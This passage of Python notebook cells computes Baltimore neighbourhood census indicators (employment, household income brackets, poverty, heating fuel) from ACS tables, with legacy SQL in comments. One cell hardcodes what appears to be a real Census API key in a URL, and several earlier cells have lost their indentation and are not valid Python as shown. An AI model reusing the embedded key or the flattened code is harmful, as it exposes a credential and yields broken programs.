set elheat = result from tbl where data2.csa = tbl.csa and update_data_year = '2014' and data_year = '2014';
"""
# Cell
#File: empl.py
#Author: Charles Karpati
#Date: 1/17/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B23001 - SEX BY AGE BY EMPLOYMENT STATUS FOR THE POPULATION 16 YEARS AND OVER
# Universe - Population 16 years and over
# Table Creates: empl, unempl, unempr, nilf
#purpose: Produce Workforce and Economic Development - Percent Population 16-64 Employed Indicator
#input: Year
#output:
import pandas as pd
import glob
def empl( year ):
def getColName (df, col): return df.columns[df.columns.str.contains(pat = col)][0]
def getColByName (df, col): return df[getColName(df, col)]
def addKey(df, fi, col):
key = getColName(df, col)
val = getColByName(df, col)
fi[key] = val
return fi
def nullIfEqual(df, c1, c2):
return df.apply(lambda x:
x[getColName(df, c1)]+x[getColName(df, c2)] if x[getColName(df, c1)]+x[getColName(df, c2)] != 0 else 0, axis=1)
def sumInts(df): return df.sum(numeric_only=True)
#~~~~~~~~~~~~~~~
# Step 1)
# Fetch Tract Files w/CSA Labels by Name from the 2_cleaned folder.
#~~~~~~~~~~~~~~~
fileName = ''
for name in glob.glob('AcsDataClean/B23001*5y'+str(year)+'_est.csv'):
fileName = name
df = pd.read_csv( fileName, index_col=0 )
# Aggregate by CSA
# Group By CSA so that they may be operated on
df = df.groupby('CSA')
# Aggregate Numeric Values by Sum
df = sumInts(df)
# Add 'BALTIMORE' which is the SUM of all the CSAs
#~~~~~~~~~~~~~~~
# Step 2)
# Prepare the columns
#~~~~~~~~~~~~~~~
# Final Dataframe
fi = pd.DataFrame()
columns = ['B23001_003E', 'B23001_010E', 'B23001_017E', 'B23001_024E', 'B23001_031E', 'B23001_038E', 'B23001_045E', 'B23001_052E', 'B23001_059E', 'B23001_066E', 'B23001_089E', 'B23001_096E', 'B23001_103E', 'B23001_110E', 'B23001_117E', 'B23001_124E', 'B23001_131E', 'B23001_138E', 'B23001_145E', 'B23001_152E', 'B23001_007E', 'B23001_014E', 'B23001_021E', 'B23001_028E', 'B23001_035E', 'B23001_042E', 'B23001_049E', 'B23001_056E', 'B23001_063E', 'B23001_070E', 'B23001_093E', 'B23001_100E', 'B23001_107E', 'B23001_114E', 'B23001_121E', 'B23001_128E', 'B23001_135E', 'B23001_142E', 'B23001_149E', 'B23001_156E']
for col in columns:
fi = addKey(df, fi, col)
# Numerators
numerators = pd.DataFrame()
columns = ['B23001_007E', 'B23001_014E', 'B23001_021E', 'B23001_028E', 'B23001_035E', 'B23001_042E', 'B23001_049E', 'B23001_056E', 'B23001_063E', 'B23001_070E', 'B23001_093E', 'B23001_100E', 'B23001_107E', 'B23001_114E', 'B23001_121E', 'B23001_128E', 'B23001_135E', 'B23001_142E', 'B23001_149E', 'B23001_156E']
for col in columns:
numerators = addKey(df, numerators, col)
# Denominators
denominators = pd.DataFrame()
columns = ['B23001_003E', 'B23001_010E', 'B23001_017E', 'B23001_024E', 'B23001_031E', 'B23001_038E', 'B23001_045E', 'B23001_052E', 'B23001_059E', 'B23001_066E', 'B23001_089E', 'B23001_096E', 'B23001_103E', 'B23001_110E', 'B23001_117E', 'B23001_124E', 'B23001_131E', 'B23001_138E', 'B23001_145E', 'B23001_152E']
for col in columns:
denominators = addKey(df, denominators, col)
# construct the denominator, returns 0 iff the other two rows are equal.
#~~~~~~~~~~~~~~~
# Step 3)
# Run the Calculation
# (value[21]+value[22]+value[23]+value[24]+value[25]+value[26]+value[27]+value[28]+value[29]+value[30]+value[31]+value[32]+value[33]+value[34]+value[35]+value[36]+value[37]+value[38]+value[39]+value[40]) --civil labor force empl 16-64
#/
#nullif( (value[1]+value[2]+value[3]+value[4]+value[5]+value[6]+value[7]+value[8]+value[9]+value[10]+value[11]+value[12]+value[13]+value[14]+value[15]+value[16]+value[17]+value[18]+value[19]+value[20]) -- population 16 to 64 ,0) )*100
#~~~~~~~~~~~~~~~
fi['numerator'] = numerators.sum(axis=1)
fi['denominator'] = denominators.sum(axis=1)
fi = fi[fi['denominator'] != 0] # Delete Rows where the 'denominator' column is 0
fi['final'] = (fi['numerator'] / fi['denominator'] ) * 100
return fi['final']
"""
/* <empl_14> */ --
WITH tbl AS (
select csa,
( ( value[21]+value[22]+value[23]+value[24]+value[25]+value[26]+value[27]+value[28]+value[29]+value[30]+value[31]+value[32]+value[33]+value[34]+value[35]+value[36]+value[37]+value[38]+value[39]+value[40]) --civil labor force empl 16-64 / nullif( (value[1]+value[2]+value[3]+value[4]+value[5]+value[6]+value[7]+value[8]+value[9]+value[10]+value[11]+value[12]+value[13]+value[14]+value[15]+value[16]+value[17]+value[18]+value[19]+value[20]) -- population 16 to 64 ,0) )*100::numeric
as result
from vital_signs.get_acs_vars_csa_and_bc('2014',ARRAY[ 'B23001_003E','B23001_010E','B23001_017E','B23001_024E','B23001_031E','B23001_038E','B23001_045E','B23001_052E','B23001_059E','B23001_066E','B23001_089E','B23001_096E','B23001_103E','B23001_110E','B23001_117E','B23001_124E','B23001_131E','B23001_138E','B23001_145E','B23001_152E','B23001_007E','B23001_014E','B23001_021E','B23001_028E','B23001_035E','B23001_042E','B23001_049E','B23001_056E','B23001_063E','B23001_070E','B23001_093E','B23001_100E','B23001_107E','B23001_114E','B23001_121E','B23001_128E','B23001_135E','B23001_142E','B23001_149E','B23001_156E'])
)
update vital_signs.data
set empl = result from tbl where data2.csa = tbl.csa and update_data_year = '2014' and data_year = '2014';
"""
# Cell
#File: fam.py
#Author: Charles Karpati
#Date: 4/16/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B11005 - HOUSEHOLDS BY PRESENCE OF PEOPLE UNDER 18 YEARS BY HOUSEHOLD TYPE
# Universe: Households
# Table Creates: hhs, fam, femhhs
#purpose:
#input: Year
#output:
import pandas as pd
import glob
def fam( year ):
def getColName (df, col): return df.columns[df.columns.str.contains(pat = col)][0]
def getColByName (df, col): return df[getColName(df, col)]
def addKey(df, fi, col):
key = getColName(df, col)
val = getColByName(df, col)
fi[key] = val
return fi
def nullIfEqual(df, c1, c2):
return df.apply(lambda x:
x[getColName(df, c1)]+x[getColName(df, c2)] if x[getColName(df, c1)]+x[getColName(df, c2)] != 0 else 0, axis=1)
def sumInts(df): return df.sum(numeric_only=True)
#~~~~~~~~~~~~~~~
# Step 1)
# Fetch Tract Files w/CSA Labels by Name from the 2_cleaned folder.
#~~~~~~~~~~~~~~~
fileName = ''
for name in glob.glob('AcsDataClean/B11005*5y'+str(year)+'_est.csv'):
fileName = name
df = pd.read_csv( fileName, index_col=0 )
# Aggregate by CSA
# Group By CSA so that they may be operated on
df = df.groupby('CSA')
# Aggregate Numeric Values by Sum
df = df.sum(numeric_only=True)
# Delete Unassigned--Jail
df = df[df.index != 'Unassigned--Jail']
# Move Baltimore to Bottom
bc = df.loc[ 'Baltimore City' ]
df = df.drop( df.index[1] )
df.loc[ 'Baltimore City' ] = bc
df1 = pd.DataFrame()
df1['CSA'] = df.index
df1.set_index('CSA', drop = True, inplace = True)
# Actually produce the data
df1['total'] = df[ 'B11005_001E_Total' ]
df1['18Under'] = df[ 'B11005_002E_Total_Households_with_one_or_more_people_under_18_years' ] / df1['total'] * 100
return df1['18Under']
# Cell
#File: female.py
#Author: Charles Karpati
#Date: 4/16/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B01001 - SEX BY AGE
# Universe: Total population
# Table Creates: tpop, female, male, age5 age18 age24 age64 age65
#purpose:
#input: Year
#output:
import pandas as pd
import glob
def female( year ):
def getColName (df, col): return df.columns[df.columns.str.contains(pat = col)][0]
def getColByName (df, col): return df[getColName(df, col)]
def addKey(df, fi, col):
key = getColName(df, col)
val = getColByName(df, col)
fi[key] = val
return fi
def nullIfEqual(df, c1, c2):
return df.apply(lambda x:
x[getColName(df, c1)]+x[getColName(df, c2)] if x[getColName(df, c1)]+x[getColName(df, c2)] != 0 else 0, axis=1)
def sumInts(df): return df.sum(numeric_only=True)
#~~~~~~~~~~~~~~~
# Step 1)
# Fetch Tract Files w/CSA Labels by Name from the 2_cleaned folder.
#~~~~~~~~~~~~~~~
fileName = ''
for name in glob.glob('AcsDataClean/B01001*5y'+str(year)+'_est.csv'):
fileName = name
df = pd.read_csv( fileName, index_col=0 )
# Aggregate by CSA
# Group By CSA so that they may be operated on
df = df.groupby('CSA')
# Aggregate Numeric Values by Sum
df = df.sum(numeric_only=True)
# df.columns
total = df['B01001_001E_Total']
df1 = pd.DataFrame()
df1['CSA'] = df.index
df1.set_index('CSA', drop = True, inplace = True)
df1['onlyTheLadies'] = df[ 'B01001_026E_Total_Female' ]
return df1['onlyTheLadies']
# Cell
#File: femhhs.py
#Author: Charles Karpati
#Date: 4/16/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B11005 - HOUSEHOLDS BY PRESENCE OF PEOPLE UNDER 18 YEARS BY HOUSEHOLD TYPE
# Universe: Households
# Table Creates: male, hhs, fam, femhhs
#purpose:
#input: Year
#output:
import pandas as pd
import glob
def femhhs( year ):
def getColName (df, col): return df.columns[df.columns.str.contains(pat = col)][0]
def getColByName (df, col): return df[getColName(df, col)]
def addKey(df, fi, col):
key = getColName(df, col)
val = getColByName(df, col)
fi[key] = val
return fi
def nullIfEqual(df, c1, c2):
return df.apply(lambda x:
x[getColName(df, c1)]+x[getColName(df, c2)] if x[getColName(df, c1)]+x[getColName(df, c2)] != 0 else 0, axis=1)
def sumInts(df): return df.sum(numeric_only=True)
#~~~~~~~~~~~~~~~
# Step 1)
# Fetch Tract Files w/CSA Labels by Name from the 2_cleaned folder.
#~~~~~~~~~~~~~~~
fileName = ''
for name in glob.glob('AcsDataClean/B11005*5y'+str(year)+'_est.csv'):
fileName = name
df = pd.read_csv( fileName, index_col=0 )
# Aggregate by CSA
# Group By CSA so that they may be operated on
df = df.groupby('CSA')
# Aggregate Numeric Values by Sum
df = df.sum(numeric_only=True)
df1 = pd.DataFrame()
df1['CSA'] = df.index
df1.set_index('CSA', drop = True, inplace = True)
# DIFFERENCES IN TABLE NAMES EXIST BETWEEN 16 and 17. 17 has no comma.
rootStr = 'B11005_007E_Total_Households_with_one_or_more_people_under_18_years_Family_households_Other_family_Female_householder'
str16 = rootStr + ',_no_husband_present'
str17 = rootStr + '_no_husband_present'
str19 = rootStr + ',_no_spouse_present'
femhh = str17 if year == '17' else str19 if year == '19' else str16
# Actually produce the data
df1['total'] = df[ 'B11005_001E_Total' ]
df1['18Under'] = df[ 'B11005_002E_Total_Households_with_one_or_more_people_under_18_years' ] / df1['total'] * 100
df1['FemaleHH'] = df[ femhh ] / df['B11005_002E_Total_Households_with_one_or_more_people_under_18_years'] * 100
df1['FamHHChildrenUnder18'] = df['B11005_003E_Total_Households_with_one_or_more_people_under_18_years_Family_households']
df1['FamHHChildrenOver18'] = df['B11005_012E_Total_Households_with_no_people_under_18_years_Family_households']
df1['FamHH'] = df1['FamHHChildrenOver18'] + df1['FamHHChildrenUnder18']
return df1['FemaleHH']
# Cell
#File: heatgas.py
#Author: Charles Karpati
#Date: 1/17/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B25040 - HOUSE HEATING FUEL
# Universe - Occupied housing units
# Table Creates: elheat, heatgas
#purpose: Produce Sustainability - Percent of Residences Heated by Electricity Indicator
#input: Year
#output:
import pandas as pd
import glob
def heatgas( year ):
def getColName (df, col): return df.columns[df.columns.str.contains(pat = col)][0]
def getColByName (df, col): return df[getColName(df, col)]
def addKey(df, fi, col):
key = getColName(df, col)
val = getColByName(df, col)
fi[key] = val
return fi
def nullIfEqual(df, c1, c2):
return df.apply(lambda x:
x[getColName(df, c1)]+x[getColName(df, c2)] if x[getColName(df, c1)]+x[getColName(df, c2)] != 0 else 0, axis=1)
def sumInts(df): return df.sum(numeric_only=True)
#~~~~~~~~~~~~~~~
# Step 1)
# Fetch Tract Files w/CSA Labels by Name from the 2_cleaned folder.
#~~~~~~~~~~~~~~~
fileName = ''
for name in glob.glob('AcsDataClean/B25040*5y'+str(year)+'_est.csv'):
fileName = name
df = pd.read_csv( fileName, index_col=0 )
# Aggregate by CSA
# Group By CSA so that they may be operated on
df = df.groupby('CSA')
# Aggregate Numeric Values by Sum
df = sumInts(df)
# Add 'BALTIMORE' which is the SUM of all the CSAs
#~~~~~~~~~~~~~~~
# Step 2)
# Prepare the columns
#~~~~~~~~~~~~~~~
# Final Dataframe
fi = pd.DataFrame()
columns = ['B25040_002E','B25040_001E']
for col in columns:
fi = addKey(df, fi, col)
# Numerators
numerators = pd.DataFrame()
columns = ['B25040_002E']
for col in columns:
numerators = addKey(df, numerators, col)
# Denominators
denominators = pd.DataFrame()
columns = ['B25040_001E']
for col in columns:
denominators = addKey(df, denominators, col)
# construct the denominator, returns 0 iff the other two rows are equal.
#~~~~~~~~~~~~~~~
# Step 3)
# Run the Calculation
# ( value[1] / nullif(value[2],0) )*100
#~~~~~~~~~~~~~~~
fi['numerator'] = numerators.sum(axis=1)
fi['denominator'] = denominators.sum(axis=1)
fi = fi[fi['denominator'] != 0] # Delete Rows where the 'denominator' column is 0
fi['final'] = (fi['numerator'] / fi['denominator'] ) * 100
return fi['final']
"""
/* <heatgas_14> */ --
WITH tbl AS (
select csa,
( value[1] / nullif(value[2],0) )*100::numeric as result
from vital_signs.get_acs_vars_csa_and_bc('2014',ARRAY['B25040_002E','B25040_001E'])
)
update vital_signs.data
set heatgas = result from tbl where data2.csa = tbl.csa and update_data_year = '2014' and data_year = '2014';
"""
# Cell
#File: hh40inc.py
#Author: Charles Karpati
#Date: 1/17/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B19001 - HOUSEHOLD INCOME V
# HOUSEHOLD INCOME IN THE PAST 12 MONTHS (IN 2017 INFLATION-ADJUSTED DOLLARS)
# Table Creates: hh25 hh40 hh60 hh75 hhm75, mhhi
#purpose: Produce Household Income 25K-40K Indicator
#input: Year
#output:
import pandas as pd
import glob
def hh40inc( year ):
def getColName (df, col): return df.columns[df.columns.str.contains(pat = col)][0]
def getColByName (df, col): return df[getColName(df, col)]
def nullIfEqual(df, c1, c2):
return df.apply(lambda x:
x[getColName(df, c1)]+x[getColName(df, c2)] if x[getColName(df, c1)]+x[getColName(df, c2)] != 0 else 0, axis=1)
def sumInts(df): return df.sum(numeric_only=True)
#~~~~~~~~~~~~~~~
# Step 1)
# Fetch Tract Files w/CSA Labels by Name from the 2_cleaned folder.
#~~~~~~~~~~~~~~~
fileName = ''
for name in glob.glob('AcsDataClean/B19001*5y'+str(year)+'_est.csv'):
fileName = name
df = pd.read_csv( fileName, index_col=0 )
# Aggregate by CSA
# Group By CSA so that they may be operated on
df = df.groupby('CSA')
# Aggregate Numeric Values by Sum
df = sumInts(df)
# Add 'BALTIMORE' which is the SUM of all the CSAs
#~~~~~~~~~~~~~~~
# Step 2)
# Prepare the columns
#~~~~~~~~~~~~~~~
# val1.__class__.__name__
#
# create a new dataframe for giggles
fi = pd.DataFrame()
# append into that dataframe col 001
key = getColName(df, '001')
val = getColByName(df, '001')
fi[key] = val
# append into that dataframe col 006
key = getColName(df, '006')
val = getColByName(df, '006')
fi[key] = val
# append into that dataframe col 007
key = getColName(df, '007')
val = getColByName(df, '007')
fi[key] = val
# append into that dataframe col 008
key = getColName(df, '008')
val = getColByName(df, '008')
fi[key] = val
# Delete Rows where the 'denominator' column is 0 -> like the Jail
fi = fi[fi[fi.columns[0]] != 0]
#~~~~~~~~~~~~~~~
# Step 3)
# Run the Calculation
#~~~~~~~~~~~~~~~
return fi.apply(lambda x: ( ( x[fi.columns[1] ]+ x[fi.columns[2] ]+ x[fi.columns[3] ] ) / x[fi.columns[0]])*100, axis=1)
"""
/* hh40inc */ --
WITH tbl AS (
select csa,
( (value[1] + value[2] + value[3]) / value[4] )*100 as result
from vital_signs.get_acs_vars_csa_and_bc('2013',ARRAY['B19001_006E','B19001_007E','B19001_008E','B19001_001E'])
)
UPDATE vital_signs.data
set hh40inc = result from tbl where data.csa = tbl.csa and data_year = '2013';
"""
# Cell
#File: hh60inc.py
#Author: Charles Karpati
#Date: 1/17/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B19001 - HOUSEHOLD INCOME V
# HOUSEHOLD INCOME IN THE PAST 12 MONTHS (IN 2017 INFLATION-ADJUSTED DOLLARS)
# Table Creates: hh25 hh40 hh60 hh75 hhm75, mhhi
#purpose: Produce Household Income 40-60K Indicator
#input: Year
#output:
import pandas as pd
import glob
def hh60inc( year ):
def getColName (df, col): return df.columns[df.columns.str.contains(pat = col)][0]
def getColByName (df, col): return df[getColName(df, col)]
def nullIfEqual(df, c1, c2):
return df.apply(lambda x:
x[getColName(df, c1)]+x[getColName(df, c2)] if x[getColName(df, c1)]+x[getColName(df, c2)] != 0 else 0, axis=1)
def sumInts(df): return df.sum(numeric_only=True)
#~~~~~~~~~~~~~~~
# Step 1)
# Fetch Tract Files w/CSA Labels by Name from the 2_cleaned folder.
#~~~~~~~~~~~~~~~
fileName = ''
for name in glob.glob('AcsDataClean/B19001*5y'+str(year)+'_est.csv'):
fileName = name
df = pd.read_csv( fileName, index_col=0 )
# Aggregate by CSA
# Group By CSA so that they may be operated on
df = df.groupby('CSA')
# Aggregate Numeric Values by Sum
df = sumInts(df)
# Add 'BALTIMORE' which is the SUM of all the CSAs
#~~~~~~~~~~~~~~~
# Step 2)
# Prepare the columns
#~~~~~~~~~~~~~~~
# val1.__class__.__name__
#
# create a new dataframe for giggles
fi = pd.DataFrame()
# append into that dataframe col 001
key = getColName(df, '001')
val = getColByName(df, '001')
fi[key] = val
# append into that dataframe col 009
key = getColName(df, '009')
val = getColByName(df, '009')
fi[key] = val
# append into that dataframe col 010
key = getColName(df, '010')
val = getColByName(df, '010')
fi[key] = val
# append into that dataframe col 011
key = getColName(df, '011')
val = getColByName(df, '011')
fi[key] = val
# Delete Rows where the 'denominator' column is 0 -> like the Jail
fi = fi[fi[fi.columns[0]] != 0]
#~~~~~~~~~~~~~~~
# Step 3)
# Run the Calculation
#~~~~~~~~~~~~~~~
return fi.apply(lambda x: ( ( x[fi.columns[1] ]+ x[fi.columns[2] ]+ x[fi.columns[3] ] ) / x[fi.columns[0]])*100, axis=1)
"""
/* hh60inc */ --
WITH tbl AS (
select csa,
( (value[1] + value[2] + value[3]) / value[4] )*100 as result
from vital_signs.get_acs_vars_csa_and_bc('2013',ARRAY['B19001_009E','B19001_010E','B19001_011E','B19001_001E'])
)
UPDATE vital_signs.data
set hh60inc = result from tbl where data.csa = tbl.csa and data_year = '2013';
"""
# Cell
#File: hh75inc.py
#Author: Charles Karpati
#Date: 1/17/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B19001 - HOUSEHOLD INCOME V
# HOUSEHOLD INCOME IN THE PAST 12 MONTHS (IN 2017 INFLATION-ADJUSTED DOLLARS)
# Table Creates: hh25 hh40 hh60 hh75 hhm75, mhhi
#purpose: Produce Household Income 60-75K Indicator
#input: Year
#output:
import pandas as pd
import glob
def hh75inc( year ):
    def getColName(df, col): return df.columns[df.columns.str.contains(pat=col)][0]
    def getColByName(df, col): return df[getColName(df, col)]
    def nullIfEqual(df, c1, c2):
        return df.apply(lambda x:
            x[getColName(df, c1)] + x[getColName(df, c2)]
            if x[getColName(df, c1)] + x[getColName(df, c2)] != 0 else 0, axis=1)
    def sumInts(df): return df.sum(numeric_only=True)
    #~~~~~~~~~~~~~~~
    # Step 1)
    # Fetch Tract Files w/CSA Labels by Name from the 2_cleaned folder.
    #~~~~~~~~~~~~~~~
    fileName = ''
    for name in glob.glob('AcsDataClean/B19001*5y'+str(year)+'_est.csv'):
        fileName = name
    df = pd.read_csv( fileName, index_col=0 )
    # Aggregate by CSA
    # Group By CSA so that they may be operated on
    df = df.groupby('CSA')
    # Aggregate Numeric Values by Sum
    df = sumInts(df)
    # Add 'BALTIMORE' which is the SUM of all the CSAs
    #~~~~~~~~~~~~~~~
    # Step 2)
    # Prepare the columns
    #~~~~~~~~~~~~~~~
    # Create a new dataframe and append the needed columns:
    # 001 (the denominator) and 012 (the numerator)
    fi = pd.DataFrame()
    for col in ['001', '012']:
        fi[getColName(df, col)] = getColByName(df, col)
    # Delete Rows where the 'denominator' column is 0 -> like the Jail
    fi = fi[fi[fi.columns[0]] != 0]
    #~~~~~~~~~~~~~~~
    # Step 3)
    # Run the Calculation: 012 / 001
    #~~~~~~~~~~~~~~~
    return fi.apply(lambda x: (x[fi.columns[1]] / x[fi.columns[0]]) * 100, axis=1)
"""
/* hh75inc */ --
WITH tbl AS (
select csa,
( value[1] / value[2] )*100 as result
from vital_signs.get_acs_vars_csa_and_bc('2013',ARRAY['B19001_012E','B19001_001E'])
)
UPDATE vital_signs.data
set hh75inc = result from tbl where data.csa = tbl.csa and data_year = '2013';
"""
# Cell
#File: hhchpov.py
#Author: Charles Karpati
#Date: 1/17/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B17001 - POVERTY STATUS IN THE PAST 12 MONTHS BY SEX BY AGE
# Universe: Population for whom poverty status is determined
#purpose: Produce Household Poverty Indicator
#input: Year
#output:
import pandas as pd
import glob
def hhchpov( year ):
    def getColName(df, col): return df.columns[df.columns.str.contains(pat=col)][0]
    def getColByName(df, col): return df[getColName(df, col)]
    def addKey(df, fi, col):
        key = getColName(df, col)
        val = getColByName(df, col)
        fi[key] = val
        return fi
    def nullIfEqual(df, c1, c2):
        return df.apply(lambda x:
            x[getColName(df, c1)] + x[getColName(df, c2)]
            if x[getColName(df, c1)] + x[getColName(df, c2)] != 0 else 0, axis=1)
    def sumInts(df): return df.sum(numeric_only=True)
    #~~~~~~~~~~~~~~~
    # Step 1)
    # Fetch Tract Files w/CSA Labels by Name from the 2_cleaned folder.
    #~~~~~~~~~~~~~~~
    fileName = ''
    for name in glob.glob('AcsDataClean/B17001*5y'+str(year)+'_est.csv'):
        fileName = name
    df = pd.read_csv( fileName, index_col=0 )
    # Aggregate by CSA
    # Group By CSA so that they may be operated on
    df = df.groupby('CSA')
    # Aggregate Numeric Values by Sum
    df = sumInts(df)
    # Add 'BALTIMORE' which is the SUM of all the CSAs
    #~~~~~~~~~~~~~~~
    # Step 2)
    # Prepare the columns
    #~~~~~~~~~~~~~~~
    # Final Dataframe
    fi = pd.DataFrame()
    columns = ['B17001_004E', 'B17001_005E', 'B17001_006E', 'B17001_007E', 'B17001_008E', 'B17001_009E', 'B17001_018E', 'B17001_019E', 'B17001_020E', 'B17001_021E', 'B17001_022E', 'B17001_023E', 'B17001_033E', 'B17001_034E', 'B17001_035E', 'B17001_036E', 'B17001_037E', 'B17001_038E', 'B17001_047E', 'B17001_048E', 'B17001_049E', 'B17001_050E', 'B17001_051E', 'B17001_052E']
    for col in columns:
        fi = addKey(df, fi, col)
    # Numerators
    numerators = pd.DataFrame()
    columns = ['B17001_004E', 'B17001_005E', 'B17001_006E', 'B17001_007E', 'B17001_008E', 'B17001_009E', 'B17001_018E', 'B17001_019E', 'B17001_020E', 'B17001_021E', 'B17001_022E', 'B17001_023E']
    for col in columns:
        numerators = addKey(df, numerators, col)
    # Denominators
    denominators = pd.DataFrame()
    columns = ['B17001_004E', 'B17001_005E', 'B17001_006E', 'B17001_007E', 'B17001_008E', 'B17001_009E', 'B17001_018E', 'B17001_019E', 'B17001_020E', 'B17001_021E', 'B17001_022E', 'B17001_023E', 'B17001_033E', 'B17001_034E', 'B17001_035E', 'B17001_036E', 'B17001_037E', 'B17001_038E', 'B17001_047E', 'B17001_048E', 'B17001_049E', 'B17001_050E', 'B17001_051E', 'B17001_052E']
    for col in columns:
        denominators = addKey(df, denominators, col)
    #~~~~~~~~~~~~~~~
    # Step 3)
    # Run the Calculation
    #~~~~~~~~~~~~~~~
    fi['numerator'] = numerators.sum(axis=1)
    fi['denominator'] = denominators.sum(axis=1)
    fi = fi[fi['denominator'] != 0] # Delete Rows where the 'denominator' column is 0
    fi['final'] = (fi['numerator'] / fi['denominator']) * 100
    #~~~~~~~~~~~~~~~
    # Step 4)
    # Add Special Baltimore City Data
    #~~~~~~~~~~~~~~~
    url = 'https://api.census.gov/data/20'+str(year)+'/acs/acs5/subject?get=NAME,S1701_C03_002E&for=county%3A510&in=state%3A24&key=829bf6f2e037372acbba32ba5731647c5127fdb0'
    table = pd.read_json(url, orient='records')
    fi['final']['Baltimore City'] = float(table.loc[1, table.columns[1]])
    return fi['final']
"""
/* <hhchpov_14> */
WITH tbl AS (
select csa,
( (value[1] + value[2] + value[3] + value[4] + value[5] + value[6] + value[7] + value[8] + value[9] + value[10] + value[11] + value[12])
/ nullif(
(value[1] + value[2] + value[3] + value[4] + value[5] + value[6] + value[7] + value[8] + value[9] + value[10] + value[11] + value[12] + value[13] + value[14] + value[15] + value[16] + value[17] + value[18] + value[19] + value[20] + value[21] + value[22] + value[23] + value[24] ),
0)
) * 100::numeric as result
from vital_signs.get_acs_vars_csa_and_bc('2014',ARRAY['B17001_004E','B17001_005E','B17001_006E','B17001_007E','B17001_008E','B17001_009E','B17001_018E','B17001_019E','B17001_020E','B17001_021E','B17001_022E','B17001_023E','B17001_033E','B17001_034E','B17001_035E','B17001_036E','B17001_037E','B17001_038E','B17001_047E','B17001_048E','B17001_049E','B17001_050E','B17001_051E','B17001_052E'])
)
update vital_signs.data
set hhchpov = result from tbl where data2.csa = tbl.csa and update_data_year = '2014' and data_year = '2014';
"""
# Cell
#File: hhm75.py
#Author: Charles Karpati
#Date: 1/17/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B19001 - HOUSEHOLD INCOME V
# HOUSEHOLD INCOME IN THE PAST 12 MONTHS (IN 2017 INFLATION-ADJUSTED DOLLARS)
# Table Creates: hh25 hh40 hh60 hh75 hhm75, mhhi
#purpose: Produce Household Income Over 75K Indicator
#input: Year
#output:
import pandas as pd
import glob
def hhm75( year ):
    def getColName(df, col): return df.columns[df.columns.str.contains(pat=col)][0]
    def getColByName(df, col): return df[getColName(df, col)]
    def nullIfEqual(df, c1, c2):
        return df.apply(lambda x:
            x[getColName(df, c1)] + x[getColName(df, c2)]
            if x[getColName(df, c1)] + x[getColName(df, c2)] != 0 else 0, axis=1)
    def sumInts(df): return df.sum(numeric_only=True)
    #~~~~~~~~~~~~~~~
    # Step 1)
    # Fetch Tract Files w/CSA Labels by Name from the 2_cleaned folder.
    #~~~~~~~~~~~~~~~
    fileName = ''
    for name in glob.glob('AcsDataClean/B19001*5y'+str(year)+'_est.csv'):
        fileName = name
    df = pd.read_csv( fileName, index_col=0 )
    # Aggregate by CSA
    # Group By CSA so that they may be operated on
    df = df.groupby('CSA')
    # Aggregate Numeric Values by Sum
    df = sumInts(df)
    # Add 'BALTIMORE' which is the SUM of all the CSAs
    #~~~~~~~~~~~~~~~
    # Step 2)
    # Prepare the columns
    #~~~~~~~~~~~~~~~
    # Create a new dataframe and append columns 001 (the denominator)
    # and 002-012 (every bracket below $75K).
    fi = pd.DataFrame()
    for col in ['001', '002', '003', '004', '005', '006', '007', '008', '009', '010', '011', '012']:
        fi[getColName(df, col)] = getColByName(df, col)
    # Delete Rows where the 'denominator' column is 0 -> like the Jail
    fi = fi[fi[fi.columns[0]] != 0]
    #~~~~~~~~~~~~~~~
    # Step 3)
    # Run the Calculation: (total - all brackets below 75K) / total
    #~~~~~~~~~~~~~~~
    return fi.apply(lambda x: ((x[fi.columns[0]] - sum(x[fi.columns[i]] for i in range(1, 12))) / x[fi.columns[0]]) * 100, axis=1)
# Cell
#File: hhpov.py
#Author: Charles Karpati
#Date: 1/17/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B17017 - Household Poverty
# Poverty Status in the Past 12 Months by Household Type by Age of Householder (Universe: households)
#purpose: Produce Household Poverty Indicator
#input: Year
#output:
import pandas as pd
import glob
def hhpov( year ):
    def getColName(df, col): return df.columns[df.columns.str.contains(pat=col)][0]
    def getColByName(df, col): return df[getColName(df, col)]
    def nullIfEqual(df, c1, c2):
        return df.apply(lambda x:
            x[getColName(df, c1)] + x[getColName(df, c2)]
            if x[getColName(df, c1)] + x[getColName(df, c2)] != 0 else 0, axis=1)
    def sumInts(df): return df.sum(numeric_only=True)
    #~~~~~~~~~~~~~~~
    # Step 1)
    # Fetch Tract Files w/CSA Labels by Name from the 2_cleaned folder.
    #~~~~~~~~~~~~~~~
    fileName = ''
    for name in glob.glob('AcsDataClean/B17017*5y'+str(year)+'_est.csv'):
        fileName = name
    df = pd.read_csv( fileName, index_col=0 )
    # Aggregate by CSA
    # Group By CSA so that they may be operated on
    df = df.groupby('CSA')
    # Aggregate Numeric Values by Sum
    df = sumInts(df)
    # Add 'BALTIMORE' which is the SUM of all the CSAs
    #~~~~~~~~~~~~~~~
    # Step 2)
    # Prepare the columns
    #~~~~~~~~~~~~~~~
    # Create a new dataframe and append columns 003 and 032
    fi = pd.DataFrame()
    for col in ['003', '032']:
        fi[getColName(df, col)] = getColByName(df, col)
    # Construct the denominator: the row-wise sum of 003 and 032 (0 when both are 0)
    fi['denominator'] = nullIfEqual( df, '003', '032')
    # Delete Rows where the 'denominator' column is 0
    fi = fi[fi['denominator'] != 0]
    #~~~~~~~~~~~~~~~
    # Step 3)
    # Run the Calculation
    #~~~~~~~~~~~~~~~
    return fi.apply(lambda x: (x[fi.columns[0]] / x['denominator']) * 100, axis=1)
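# Note that nullIfEqual, despite its name, returns the row-wise sum of the
# two matched columns, with 0 preserved so zero-universe rows can be dropped
# next -- the pandas analogue of SQL's nullif(a + b, 0). Its behavior on toy
# data (the two column names below are hypothetical):

```python
import pandas as pd

def getColName(df, col):
    return df.columns[df.columns.str.contains(pat=col)][0]
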